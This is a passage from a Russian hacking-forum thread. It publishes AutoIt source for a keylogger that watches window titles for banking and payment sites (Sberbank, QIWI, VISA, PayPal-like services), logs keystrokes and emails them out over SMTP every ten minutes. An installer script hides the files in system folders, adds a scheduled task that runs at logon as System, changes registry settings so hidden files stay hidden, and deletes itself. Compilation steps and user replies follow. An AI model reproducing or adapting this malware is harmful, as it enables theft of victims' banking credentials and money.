FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
  ElseIf WinWaitActive("RBK Money","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  RBK Money </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://rbkmoney.ru/ target=blanck>https://rbkmoney.ru/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
  ElseIf WinWaitActive("LiqPAY","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  LiqPAY </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://liqpay.com/ target=blanck>https://liqpay.com/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
  ElseIf WinWaitActive("Perfect Money","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Perfect Money </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://perfectmoney.com/?lang=ru_RU target=blanck>https://perfectmoney.com/?lang=ru_RU</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
  ElseIf WinWaitActive("Global Digital Pay","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Global Digital Pay </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://www.globaldigitalpay.com/ target=blanck>https://www.globaldigitalpay.com/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
  ElseIf WinWaitActive("EasyPay","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  EasyPay </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://ssl.easypay.by/ target=blanck>https://ssl.easypay.by/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
ElseIf WinWaitActive("Pecunix","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Pecunix </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.pecunix.com/ target=blanck>http://www.pecunix.com/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
ElseIf WinWaitActive("VISA.","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  VISA. </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.visa.com.ru/main.jsp target=blanck>http://www.visa.com.ru/main.jsp</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
ElseIf WinWaitActive("MasterCard®","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  MasterCard® </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.mastercard.com/ru/gateway.html target=blanck>http://www.mastercard.com/ru/gateway.html</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
ElseIf WinWaitActive("Сбербанк","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Сбербанк </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://sberbank.ru target=blanck>http://sberbank.ru</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
ElseIf WinWaitActive("Альфа-Банк","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Альфа-Банк </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.alfabank.ru/ target=blanck>http://www.alfabank.ru/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
ElseIf WinWaitActive("ВТБ24","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  ВТБ24 </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.vtb24.ru/ target=blanck>http://www.vtb24.ru/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
ElseIf WinWaitActive("Промсвязьбанк:","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Промсвязьбанк: </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.psbank.ru/ target=blanck>http://www.psbank.ru/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
ElseIf WinWaitActive("ПриватБанк","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  ПриватБанк </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://privatbank.ru/ target=blanck>http://privatbank.ru/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
ElseIf WinWaitActive("QIWI","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  QIWI </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.qiwi.ru/ target=blanck>http://www.qiwi.ru/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
    EndIf
WEnd
; функция отправки письма на почту
func _inetsmtpmailcom($s_smtpserver, $s_fromname, $s_fromaddress, $s_toaddress, $s_subject = "", $as_body = "", $s_attachfiles = "", $s_ccaddress = "", $s_bccaddress = "", $s_importance="normal", $s_username = "", $s_password = "", $ipport = 25, $ssl = 0)
    local $objemail = objcreate("cdo.message")
    $objemail.from = '"' & $s_fromname & '" <' & $s_fromaddress & '>'
    $objemail.to = $s_toaddress
    local $i_error = 0
    local $i_error_desciption = ""
    if $s_ccaddress <> "" then $objemail.cc = $s_ccaddress
    if $s_bccaddress <> "" then $objemail.bcc = $s_bccaddress
    $objemail.subject = $s_subject
    if stringinstr($as_body, "<") and stringinstr($as_body, ">") then
        $objemail.htmlbody = $as_body
    else
        $objemail.textbody = $as_body & @crlf
    endif
    if $s_attachfiles <> "" then
        local $s_files2attach = stringsplit($s_attachfiles, ";")
        for $x = 1 to $s_files2attach[0]
            $s_files2attach[$x] = _pathfull($s_files2attach[$x])
            if fileexists($s_files2attach[$x]) then
                consolewrite('+> file attachment added: ' & $s_files2attach[$x] & @lf)
                $objemail.addattachment($s_files2attach[$x])
            else
                consolewrite('!> file not found to attach: ' & $s_files2attach[$x] & @lf)
                seterror(1)
                return 0
            endif
        next
    endif
    $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_smtpserver
    if number($ipport) = 0 then $ipport = 25
    $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $ipport
    if $s_username <> "" then
        $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
        $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_username
        $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_password
    endif
    if $ssl then
        $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = true
    endif
    $objemail.configuration.fields.update
    switch $s_importance
        case "high"
            $objemail.fields.item ("urn:schemas:mailheader:importance") = "high"
        case "normal"
            $objemail.fields.item ("urn:schemas:mailheader:importance") = "normal"
        case "low"
            $objemail.fields.item ("urn:schemas:mailheader:importance") = "low"
    endswitch
    $objemail.fields.update
    $objemail.send
    if @error then
        seterror(2)
        return
    endif
    $objemail=""
endfunc

Func _quit()
    sleep(1000*60*10) ;указываем промежуток времени через который будет прекращаться запись в лог файл и осуществляться отправка на почтовый ящик(10мин.=(1000*60*10))
$PID = ProcessExists("wincl.exe") ; вычесляем PID так сказать индетефикационный номер процесса кейлогера
If $PID Then ProcessClose($PID) ; и убиваем его,хотя можно тупа обойтись одним убийством указав имя нужного процесса
sleep(500)
FileOpen($log, 1)
  FileWrite($log, "</body>")
  FileWrite($log, "<b><center><font color=red >&copy; [email protected] Specially for <a href=http://thehackworld.in target=blanck >TheHackWorld.iN</a> </font></center>")
  FileClose($log)
  sleep(500)
$stext=FileRead(FileOpen($log, 0)); читаем файл лога в переменную которая является телом отправляемого письма
sleep(1000)
_inetsmtpmailcom($smtpserver,$fromname,$fromaddress,$toaddress,$subject,$stext,$attachfiles,$ccaddress,$bccaddress,$importance,$username,$password,$ipport,$ssl) ; запускаем функцию отправки письма,тем самым отправляем письмо с логом
sleep(100)
FileDelete($log) ; удаляем файл лога и повторяем весь алгоритм скрипта.
EndFunc
Следом завершающий скрипт который будет устанавливать данный кейлогер на комп жертвы,его надо будет компилить самым последним,вообщем дальше приведу не большую инструкцию по сборки всего этого добра в один исполняемый файл.
Сам скрипт alsol.au3
Код:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  [#[ Keyloger Site detektors 1.0 beta ® by [email protected] Specially for TheHackWorld.iN ©]#]  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Данный вирус был написан специально для пользователей нашего нового ресурса посвященного теме безопасности в сети интернет TheHackWorld.iN
;Вирус состоит из трёх скриптов:
;stisx.au3 - скрипт который собирает не много информации о такчке на которой он запущен и детектит заголовки активных оконо и при нахождение нужного окна запускает сам кейлогер который пишет лог
;после ждёт некоротый промежуток времени(который вы укажите),останавливает работу кейлогера и отправляет отчет на почтовый ящик который вы укажите,после весь процесс повторяется.
;wincl.au3 - скрипт по сути является самим кейлогером,пишет символы в файл лога
;alsol.au3 - скрипт носитель,является носителем двух пред идущих скриптов,при запуске его он устанавливает пред идущие скрипты и запускает stisx.au3,так же вносит некоторые изменения в системе
;то есть правит пару ключей реестра и создаёт правило которое то и запускает наш кейлогер при каждом входе в систему.
;По сути все скрипты написаны предельно просто и будут просто замечательным (на мой взгляд) вирусом который можно сделать самому не зная ни какого языка программирования.
;                                                                          SwAp Specially for TheHackWorld.iN ©
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
#NoTrayIcon
#Include <process.au3>
#include <file.au3>
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Не много об алгоритме данного скрипта(в теле он будет не много раскоменнтирован);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Алгоритм данного скрипта довольно прост,нету ни каких замарочек с проверками на наличие уже существующих значений или файлов,он тупа сначала удаляет то что может установить(за исключением
;ключей реестра),а после устанавливает.
;Так как если попытаться заменить любой запущенный файл на другой,то вылетит ошибка,а если перед этим убить его процесс,то ни каких ошибок в процессе установки не будет.
;Ну тип как то так,думаю и так понятно что к чему и более подробно расписывать не нужно,ну если вдруг кто чего не допонял,то практически каждое действие в скрипте раскоментированно
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; в данном скрипте не трогаем ни чего,в нём всё норм,он только устанвливает файлы и удаляет себя в последствие ;;;;;;;;;;;;;;;;;;;;;;;;;;;;

_RunDOS( 'schtasks /delete /tn WanResci /f' ) ; удаляет правило которое запускало данный кейлогер
sleep(100)
ProcessClose("stisx.exe") ; убивает процесс который постоянно висит в процессах и детектит заголовки в активных окнах
sleep(100)
ProcessClose("wincl.exe") ; так на всякий случай,ну вдруг кейлогер уже запущен и работает
sleep(100)
DirRemove(@WindowsDir & "\GTS",1) ;удаляет папку где распаложен кейлогер,можно разумеется и по файлам удалять
sleep(100)
DirCreate(@WindowsDir & "\GTS") ; создаёт папку в которую в последствие будут выгружаться и располагаться файлы кейлогера
sleep(100)
DirCreate(@WindowsDir & "\swnc"); создаёт папку где будет рапсолагаться файл лога
sleep(100)
FileInstall("stisx.exe", @WindowsDir & "\GTS\stisx.exe") ;данная функция выполняет так сказать инсталяцию файлов,то есть при компиляции скрипта она грузит файлы в сам скрипт,а при запуске уже скомпилированного скрипта
;она выгружает и так сказать устанавливает файлы заруженные внутрь скрипта.
sleep(100)
FileInstall("wincl.exe", @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_RunDOS( 'schtasks /create /tn WanResci /sc ONLOGON /tr ' & @WindowsDir & '\GTS\stisx.exe /ru "System" /f' ) ;создаёт правило используя schtasks,которое будет запускать при каждом входе в систему наш кейлогер
sleep(10)
FileSetAttrib ( @WindowsDir & "\GTS", "+S+H") ;ставит атрибуты скриытй и системный на папку в которой находится наш кейлогер
sleep(100)
FileSetAttrib ( @WindowsDir & "\swnc", "+H"); ставит атрибут скрытый на папку где распаложен файл лога
sleep(100)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0) ; правим реестр,так сказать вносим параметры которы будут скрывать скрытые
; и системные файлы даже если в панели управления указать на показ скрытых и защищенных файлов.
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","SuperHidden","REG_DWORD",1)
sleep(100)
run(@WindowsDir & "\GTS\stisx.exe") ; запускает файл детектора
sleep(100)
_scriptdestroy()
func _scriptdestroy() ; функция само удаления
    $stemp = _tempfile(@tempdir, '~', '.bat'); создаёт bat файл в временной папке и пишет в переменную  $stemp
    $spath = filegetshortname(@scriptfullpath) ;пишет в переменную $spath полный путь и своё имя,только как бы в укороченном варианте,ну все равно понятно системе.
    $hfile = fileopen($stemp, 2) ;пишет в переменную $hfile открытие bat файла
    filewriteline($hfile, '@echo off') ;вписывает в bat файл команды КМД
    filewriteline($hfile, ':loop')
    filewriteline($hfile, 'del ' & $spath)
    filewriteline($hfile, 'if exist ' & $spath & ' goto loop')
    filewriteline($hfile, 'del ' & $stemp)
    fileclose($hfile) ;закрывает bat файл
    run($stemp, '', @sw_hide) ;запускает файл в скрытом режиме
endfunc
Повторюсь(наверное) в скриптах практически все движения расписаны,так что если не ленится и прочитать всё содержимое скриптов то будет всё понятно.
Перйдём к компиляции и сборки всех скриптов в один исполняемый файл,компилить надо будет в опредлённом порядке,ну по крайней мере последний скрипт надо будет компилить в самую последнию очередь,так как этот скрипт будет паковать два скрипта в себя и при запуске устаналивать его на комп.
Первым компируем wincl.au3, за ним stisx.au3 и самым последним надо будет компилировать alsol.au3,при компиляции которого два скомпилированный перед этим скрипта должны находится в той же директории что и сам скрипт alsol.au3.
Скрипты не переименовываем,если же все таки есть желание назвать их по другому то ищите в скриптах соотетствуещие имена и меняйте на свои.
В итоге мы получаем один исполняемый файл,который будет работать на компе под Windows той архитектуры под которую вы его скомпилируете.

©SwAp TheHackWorld.in
  Ответить с цитированием
Ответ: Keyloger Detektors Site (by SwAp)
Старый 11.02.2012, 20:17   #2
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Keyloger Detektors Site (by SwAp)

ЫЫ уже и логгеры на Autoit мне страшно)
  Ответить с цитированием
Ответ: Keyloger Detektors Site (by SwAp)
Старый 11.02.2012, 20:44   #3
O'NeiLL
RAM 256MB
 
Аватар для O'NeiLL
 
Регистрация: 04.11.2010
Сообщений: 968
O'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордится
O'NeiLL вне форума
По умолчанию Ответ: Keyloger Detektors Site (by SwAp)

Цитата:
Сообщение от mironich Посмотреть сообщение
ЫЫ уже и логгеры на Autoit мне страшно)
да не пугайся ты так=) хотя способ реализации меня порадовал и удивил нестандартно как-то, но ИМХО всё-таки проверенные кейлогеры на си и делфи помощнее будут и постабильней
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Последний раз редактировалось O'NeiLL; 11.02.2012 в 20:57.
Ответ: Keyloger Detektors Site (by SwAp)
Старый 15.02.2012, 01:42   #4
SeOqsss
RAM 16MB
 
Аватар для SeOqsss
 
Регистрация: 28.11.2011
Сообщений: 30
SeOqsss на пути к лучшему
SeOqsss вне форума
По умолчанию Ответ: Keyloger Detektors Site (by SwAp)

Цитата:
Сообщение от O'NeiLL Посмотреть сообщение
да не пугайся ты так=) хотя способ реализации меня порадовал и удивил нестандартно как-то, но ИМХО всё-таки проверенные кейлогеры на си и делфи помощнее будут и постабильней
Смотря как напишешь,да и на asm получше чем на делфи,хотя бы тем что вес во много раз меньше,с си конечно не много по другому,ну всё же асм тоже местами рулит.
  Ответить с цитированием
Ответ: Keyloger Detektors Site (by SwAp)
Старый 15.02.2012, 03:07   #5
Supp
RAM 256MB
 
Аватар для Supp
 
Регистрация: 11.05.2011
Сообщений: 350
Supp - весьма и весьма положительная личностьSupp - весьма и весьма положительная личность
Supp вне форума
По умолчанию Ответ: Keyloger Detektors Site (by SwAp)

Цитата:
Сообщение от SeOqsss Посмотреть сообщение
Смотря как напишешь,да и на asm получше чем на делфи,хотя бы тем что вес во много раз меньше,с си конечно не много по другому,ну всё же асм тоже местами рулит.
Асма рулиD, согласен для кеев само то shto nado/
__________________
КриПтоУролоГ
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Keyloger Detektors Site (by SwAp)
Старый 15.02.2012, 08:18   #6
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Keyloger Detektors Site (by SwAp)

Цитата:
Асма рулиD, согласен для кеев само то shto nado/
Читай это кодерам перед сном, мб начнут норм продукт пилить.
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot